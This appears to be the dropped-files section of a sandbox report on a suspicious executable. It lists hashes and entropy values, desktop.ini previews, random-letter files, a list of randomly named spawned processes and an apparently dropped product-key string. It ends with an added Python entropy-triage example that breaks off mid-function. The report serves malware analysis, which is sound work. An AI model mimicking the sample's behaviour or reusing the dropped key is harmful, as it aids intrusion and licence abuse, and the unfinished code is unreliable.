                                                            SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                            SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                            Malicious:false
                                                            Preview:
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Preview:
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692024230831571
                                                            Encrypted:false
                                                            SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                            MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                            SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                            SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                            SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                            Malicious:false
                                                            Preview:
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692990330209164
                                                            Encrypted:false
                                                            SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                            MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                            SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                            SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                            SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                            Malicious:false
                                                            Preview:
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696508269038202
                                                            Encrypted:false
                                                            SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                            MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                            SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                            SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                            SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                            Malicious:false
                                                            Preview:
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:false
                                                            Preview:
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:false
                                                            Preview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
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:false
                                                            Preview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
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):402
                                                            Entropy (8bit):3.493087299556618
                                                            Encrypted:false
                                                            SSDEEP:12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
                                                            MD5:ECF88F261853FE08D58E2E903220DA14
                                                            SHA1:F72807A9E081906654AE196605E681D5938A2E6C
                                                            SHA-256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
                                                            SHA-512:82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
                                                            Malicious:false
                                                             Preview (decoded from UTF-16LE; the file begins with a BOM and an empty line):
                                                             [.ShellClassInfo]
                                                             LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21770
                                                             IconResource=%SystemRoot%\system32\imageres.dll,-112
                                                             IconFile=%SystemRoot%\system32\shell32.dll
                                                             IconIndex=-235
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Preview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
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.701195573484743
                                                            Encrypted:false
                                                            SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                            MD5:2530C45A92F347020337052A8A7D7B00
                                                            SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                            SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                            SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                            Malicious:false
                                                            Preview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
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692024230831571
                                                            Encrypted:false
                                                            SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                            MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                            SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                            SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                            SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                            Malicious:false
                                                            Preview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
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.692990330209164
                                                            Encrypted:false
                                                            SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                            MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                            SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                            SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                            SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                            Malicious:false
                                                            Preview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
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.690071120548773
                                                            Encrypted:false
                                                            SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                            MD5:8F49644C9029260CF4D4802C90BA5CED
                                                            SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                            SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                            SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                            Malicious:false
                                                            Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.687055908915499
                                                            Encrypted:false
                                                            SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                            MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                            SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                            SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                            SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                            Malicious:false
                                                            Preview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
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696703751818505
                                                            Encrypted:false
                                                            SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                            MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                            SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                            SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                            SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                            Malicious:false
                                                            Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.696508269038202
                                                            Encrypted:false
                                                            SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                            MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                            SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                            SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                            SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                            Malicious:false
                                                            Preview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
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:false
                                                            Preview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
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.6959554225029665
                                                            Encrypted:false
                                                            SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                            MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                            SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                            SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                            SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                            Malicious:false
                                                            Preview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
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):282
                                                            Entropy (8bit):3.5191090305155277
                                                            Encrypted:false
                                                            SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                            MD5:3A37312509712D4E12D27240137FF377
                                                            SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                            SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                            SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                            Malicious:false
                                                             Preview (decoded from UTF-16LE; the file begins with a BOM and an empty line):
                                                             [.ShellClassInfo]
                                                             LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21798
                                                             IconResource=%SystemRoot%\system32\imageres.dll,-184
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):190
                                                            Entropy (8bit):3.5497401529130053
                                                            Encrypted:false
                                                            SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                            MD5:D48FCE44E0F298E5DB52FD5894502727
                                                            SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                            SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                            SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                            Malicious:false
                                                             Preview (decoded from UTF-16LE; the file begins with a BOM and an empty line):
                                                             [.ShellClassInfo]
                                                             LocalizedResourceName=@%SystemRoot%\system32\windows.storage.dll,-21824
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):190
                                                            Entropy (8bit):3.5497401529130053
                                                            Encrypted:false
                                                            SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                            MD5:87A524A2F34307C674DBA10708585A5E
                                                            SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                            SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                            SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                            Malicious:false
                                                             Preview (decoded from UTF-16LE; the file begins with a BOM and an empty line):
                                                             [.ShellClassInfo]
                                                             LocalizedResourceName=@%SystemRoot%\system32\windows.storage.dll,-34583
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):504
                                                            Entropy (8bit):3.514398793376306
                                                            Encrypted:false
                                                            SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                            MD5:29EAE335B77F438E05594D86A6CA22FF
                                                            SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                            SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                            SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                            Malicious:false
                                                             Preview (decoded from UTF-16LE; the file begins with a BOM and an empty line):
                                                             [.ShellClassInfo]
                                                             LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21779
                                                             InfoTip=@%SystemRoot%\system32\shell32.dll,-12688
                                                             IconResource=%SystemRoot%\system32\imageres.dll,-113
                                                             IconFile=%SystemRoot%\system32\shell32.dll
                                                             IconIndex=-236
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):24151
                                                            Entropy (8bit):5.729198328070191
                                                            Encrypted:false
                                                            SSDEEP:96:kwJsH6HxH5HkdHe6fpHvHlhtHtHjHgFypez6pyHfHKFHmHZHZ/5garugHaBZpOdZ:Dq5oJiuk/tG5Dz3LCV5uxxYSbb0r2
                                                            MD5:9B2E477A0845341F459737912DF9A7D3
                                                            SHA1:9939FDB448F742824C6A335A39A3C7FC1288E6B0
                                                            SHA-256:8E16FF6A9AC9C4BCE47274431C2CD03C4A95F9A857AD8705256A29B5CDCC158C
                                                            SHA-512:B9030A01B6DD2FC16116ACA1C4A9619C89EE941E8283F2D28261AEA292D4B4EA86A4A5546DF4EF897592D8DCD1E9E450B0EE1CE17A858AEBBE22C2FA768BDF96
                                                            Malicious:false
                                                             Preview (CRLF line breaks restored; truncated as in the report):
                                                             NAME: StartMenuExperienceHost
                                                             PID: 4740
                                                             EXE: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                             NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY
                                                             PID: 7756
                                                             EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe
                                                             NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY
                                                             PID: 7488
                                                             EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe
                                                             NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY
                                                             PID: 5168
                                                             EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe
                                                             NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY
                                                             PID: 7320
                                                             EXE: C:\Program Files (x86)\BpwDwJKSZpWGbiaqZGqgqaintGedZIsbBHCmBiEHsMaHUEVWlepDZpfsLaDmPvRTLTwkMzmedIGyaeT\oxGQcqNUEocNrSUtLdUwZWdDVEXY.exe
                                                             NAME: oxGQcqNUEocNrSUtLdUwZWdDVEXY
                                                             PID: 2968
                                                             EXE: C:\Program Files (x86)\BpwDwJKSZpWGbia
                                                            Process:C:\Users\user\Desktop\vYz1Z2heor.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):29
                                                            Entropy (8bit):3.978333581185264
                                                            Encrypted:false
                                                            SSDEEP:3:sI7m+1yAdAE:1mOyy
                                                            MD5:A477844F136DD25FD0D1CDCC2EC91DB4
                                                            SHA1:6EF14C441FE7A8DFEE6B7E3B9CD77303E40DA9D4
                                                            SHA-256:605A0FC7303CADD8A79C063098FB8521EADAA7D909F65756CF8DE17710B15655
                                                            SHA-512:91A931296F5009D000B6F97C4FC580182B89DE7BB986118C94130CEC0AD2FB476251B5022A1C59163159A18FD02C931CF1E729BF60285ABD51A3E77B5C9B7CD0
                                                            Malicious:false
                                                            Preview:293MD-2NCHV-V6XWG-M48F4-3GQMG
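The Size and Entropy (8bit) fields in these entries are enough to verify a decoded preview and to fingerprint the repeated 1026-byte drops: every one of those files has entropy between 4.687 and 4.702, which is what a single 1024-character line drawn uniformly from A-Z gives (log2(26) = 4.700), far below the 7.5 to 8 of compressed or encrypted data. The Python below is an added example, not part of the Joe Sandbox report or of the sample's own code. It reimplements the byte-histogram Shannon entropy the report uses, rebuilds the 402-byte Documents desktop.ini and the 29-byte key file from the previews above and checks both against the report's Size and Entropy values, and applies a triage rule to a constructed random-letter file standing in for the 1026-byte drops (their contents are not reproduced on the page, so the seed, the letter stream and the function names are assumptions of this example).

```python
import math
import random
from collections import Counter

# Added example, not from the Joe Sandbox report. The desktop.ini text, the
# 29-byte key and the Size/Entropy figures come from the dropped-file entries;
# the random-letter file is constructed here as a stand-in for the 1026-byte
# drops, whose contents the page does not reproduce.

UPPER = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def shannon_entropy(data: bytes) -> float:
    """Plug-in Shannon entropy in bits per byte, the figure the report
    labels 'Entropy (8bit)'. 0.0 for empty input, at most 8.0."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def desktop_ini_bytes(lines):
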